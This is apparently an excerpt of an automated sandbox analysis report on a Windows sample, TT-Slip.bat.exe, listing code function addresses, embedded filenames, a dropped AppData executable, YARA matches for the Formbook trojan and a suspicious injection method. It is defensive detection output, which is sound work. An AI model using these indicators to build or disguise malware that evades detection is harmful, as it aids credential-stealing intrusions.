Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 0_2_06B34308	0_2_06B34308
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 0_2_06B350F0	0_2_06B350F0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 0_2_06B30006	0_2_06B30006
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 0_2_06B33068	0_2_06B33068
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00410003	9_2_00410003
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00416983	9_2_00416983
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0042D9A3	9_2_0042D9A3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00410223	9_2_00410223
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00401230	9_2_00401230
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0040E2A3	9_2_0040E2A3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00403340	9_2_00403340
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00402690	9_2_00402690
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_00402F70	9_2_00402F70
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0040FFFC	9_2_0040FFFC
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D516C	9_2_016D516C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0176B16B	9_2_0176B16B
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01728158	9_2_01728158
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01690100	9_2_01690100
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173A118	9_2_0173A118
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017581CC	9_2_017581CC
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AB1B0	9_2_016AB1B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017601AA	9_2_017601AA
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175F0E0	9_2_0175F0E0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017570E9	9_2_017570E9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A70C0	9_2_016A70C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174F0CC	9_2_0174F0CC
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168D34C	9_2_0168D34C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175A352	9_2_0175A352
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175132D	9_2_0175132D
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017603E6	9_2_017603E6
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AE3F0	9_2_016AE3F0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016E739A	9_2_016E739A
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740274	9_2_01740274
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017412ED	9_2_017412ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BB2C0	9_2_016BB2C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017202C0	9_2_017202C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A52A0	9_2_016A52A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01757571	9_2_01757571
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A0535	9_2_016A0535
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173D5B0	9_2_0173D5B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01760591	9_2_01760591
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01691460	9_2_01691460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01752446	9_2_01752446
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175F43F	9_2_0175F43F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174E4F6	9_2_0174E4F6
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A0770	9_2_016A0770
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C4750	9_2_016C4750
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169C7C0	9_2_0169C7C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175F7B0	9_2_0175F7B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BC6E0	9_2_016BC6E0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017516CC	9_2_017516CC
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B6962	9_2_016B6962
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A9950	9_2_016A9950
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BB950	9_2_016BB950
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A29A0	9_2_016A29A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0176A9A6	9_2_0176A9A6
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A2840	9_2_016A2840
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AA840	9_2_016AA840
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0170D800	9_2_0170D800
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A38E0	9_2_016A38E0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE8F0	9_2_016CE8F0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016868B8	9_2_016868B8
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175FB76	9_2_0175FB76
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175AB40	9_2_0175AB40
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01715BF0	9_2_01715BF0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016DDBF9	9_2_016DDBF9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01756BD7	9_2_01756BD7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01669B80	9_2_01669B80
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BFB80	9_2_016BFB80
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01713A6C	9_2_01713A6C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01757A46	9_2_01757A46
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175FA49	9_2_0175FA49
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174DAC6	9_2_0174DAC6
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016E5AA0	9_2_016E5AA0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173DAAC	9_2_0173DAAC
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169EA80	9_2_0169EA80
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01757D73	9_2_01757D73
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A3D40	9_2_016A3D40
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01751D5A	9_2_01751D5A
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AAD00	9_2_016AAD00
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169ADE0	9_2_0169ADE0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BFDC0	9_2_016BFDC0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B8DBF	9_2_016B8DBF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01719C32	9_2_01719C32
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A0C00	9_2_016A0C00
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175FCF2	9_2_0175FCF2
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01690CF2	9_2_01690CF2
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01740CB5	9_2_01740CB5
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01714F40	9_2_01714F40
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016E2F28	9_2_016E2F28
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C0F30	9_2_016C0F30
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175FF09	9_2_0175FF09
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016ACFE0	9_2_016ACFE0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01692FC8	9_2_01692FC8
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01663FD5	9_2_01663FD5
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01663FD2	9_2_01663FD2
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175FFB1	9_2_0175FFB1
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171EFA0	9_2_0171EFA0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1F92	9_2_016A1F92
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A0E59	9_2_016A0E59
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175EE26	9_2_0175EE26
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175EEDB	9_2_0175EEDB
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A9EB0	9_2_016A9EB0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0175CE93	9_2_0175CE93
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B2E90	9_2_016B2E90
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_0306D4FC	10_2_0306D4FC
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_075A24F8	10_2_075A24F8
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_075A33C0	10_2_075A33C0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_075AABB0	10_2_075AABB0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_075AABA2	10_2_075AABA2
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_07C04740	10_2_07C04740
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_07C02C30	10_2_07C02C30
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_07C04308	10_2_07C04308
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_07C0A9E0	10_2_07C0A9E0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_07C050F0	10_2_07C050F0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 10_2_07C03068	10_2_07C03068
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01070100	14_2_01070100
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010C6000	14_2_010C6000
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_011002C0	14_2_011002C0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01080535	14_2_01080535
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010A4750	14_2_010A4750
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01080770	14_2_01080770
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0107C7C0	14_2_0107C7C0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0109C6E0	14_2_0109C6E0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01096962	14_2_01096962
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010829A0	14_2_010829A0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0108A840	14_2_0108A840
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01082840	14_2_01082840
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010B8890	14_2_010B8890
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010668B8	14_2_010668B8
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010AE8F0	14_2_010AE8F0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0107EA80	14_2_0107EA80
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0108AD00	14_2_0108AD00
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0108ED7A	14_2_0108ED7A
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01098DBF	14_2_01098DBF
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01088DC0	14_2_01088DC0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0107ADE0	14_2_0107ADE0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01080C00	14_2_01080C00
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01070CF2	14_2_01070CF2
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010C2F28	14_2_010C2F28
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010A0F30	14_2_010A0F30
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010F4F40	14_2_010F4F40
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010FEFA0	14_2_010FEFA0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01072FC8	14_2_01072FC8
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01080E59	14_2_01080E59
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01092E90	14_2_01092E90
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010B516C	14_2_010B516C
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0106F172	14_2_0106F172
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0108B1B0	14_2_0108B1B0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0106D34C	14_2_0106D34C
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010833F3	14_2_010833F3
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010852A0	14_2_010852A0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0109B2C0	14_2_0109B2C0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0109D2F0	14_2_0109D2F0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01071460	14_2_01071460
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01083497	14_2_01083497
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010C74E0	14_2_010C74E0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0108B730	14_2_0108B730
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01089950	14_2_01089950
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0109B950	14_2_0109B950
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01085990	14_2_01085990
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010ED800	14_2_010ED800
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010838E0	14_2_010838E0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0109FB80	14_2_0109FB80
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010BDBF9	14_2_010BDBF9
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010F5BF0	14_2_010F5BF0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010F3A6C	14_2_010F3A6C
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01083D40	14_2_01083D40
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_0109FDC0	14_2_0109FDC0
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01099C20	14_2_01099C20
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_010F9C32	14_2_010F9C32
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01081F92	14_2_01081F92
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 14_2_01089EB0	14_2_01089EB0

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: String function: 0171F290 appears 105 times
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: String function: 016D5130 appears 36 times
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: String function: 0170EA12 appears 86 times
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: String function: 016E7E54 appears 96 times
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: String function: 0168B970 appears 268 times
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: String function: 010EEA12 appears 36 times
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: String function: 010C7E54 appears 97 times

Source: TT-Slip.bat.exe, 00000000.00000002.2102256186.0000000005090000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs TT-Slip.bat.exe
Source: TT-Slip.bat.exe, 00000000.00000002.2102973738.0000000006E30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs TT-Slip.bat.exe
Source: TT-Slip.bat.exe, 00000000.00000002.2099243001.000000000389F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs TT-Slip.bat.exe
Source: TT-Slip.bat.exe, 00000000.00000002.2094761896.00000000008BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs TT-Slip.bat.exe
Source: TT-Slip.bat.exe, 00000000.00000000.2043634741.0000000000286000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameKniT.exe4 vs TT-Slip.bat.exe
Source: TT-Slip.bat.exe, 00000009.00000002.2375460605.0000000001127000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs TT-Slip.bat.exe
Source: TT-Slip.bat.exe, 00000009.00000002.2376035163.000000000178D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs TT-Slip.bat.exe
Source: TT-Slip.bat.exe, 00000009.00000002.2375460605.0000000001108000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs TT-Slip.bat.exe
Source: TT-Slip.bat.exe	Binary or memory string: OriginalFilenameKniT.exe4 vs TT-Slip.bat.exe

Source: TT-Slip.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.TT-Slip.bat.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.TT-Slip.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2375891117.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4514397970.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.4517126416.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4514322449.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4514041725.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2376998691.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4515341375.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: TT-Slip.bat.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: IiIseKTckjhZgQ.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, QdJdI5bwiiEG3edPt8.cs	Security API names: _0020.SetAccessControl
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, QdJdI5bwiiEG3edPt8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, QdJdI5bwiiEG3edPt8.cs	Security API names: _0020.AddAccessRule
Source: 0.2.TT-Slip.bat.exe.6e30000.9.raw.unpack, N8Q25JcKeZW2S8FivR.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, N8Q25JcKeZW2S8FivR.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, QdJdI5bwiiEG3edPt8.cs	Security API names: _0020.SetAccessControl
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, QdJdI5bwiiEG3edPt8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TT-Slip.bat.exe.3953e30.6.raw.unpack, QdJdI5bwiiEG3edPt8.cs	Security API names: _0020.AddAccessRule

Source: 0.2.TT-Slip.bat.exe.2867a98.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.TT-Slip.bat.exe.2596868.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.TT-Slip.bat.exe.6ab0000.8.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.TT-Slip.bat.exe.2586850.5.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

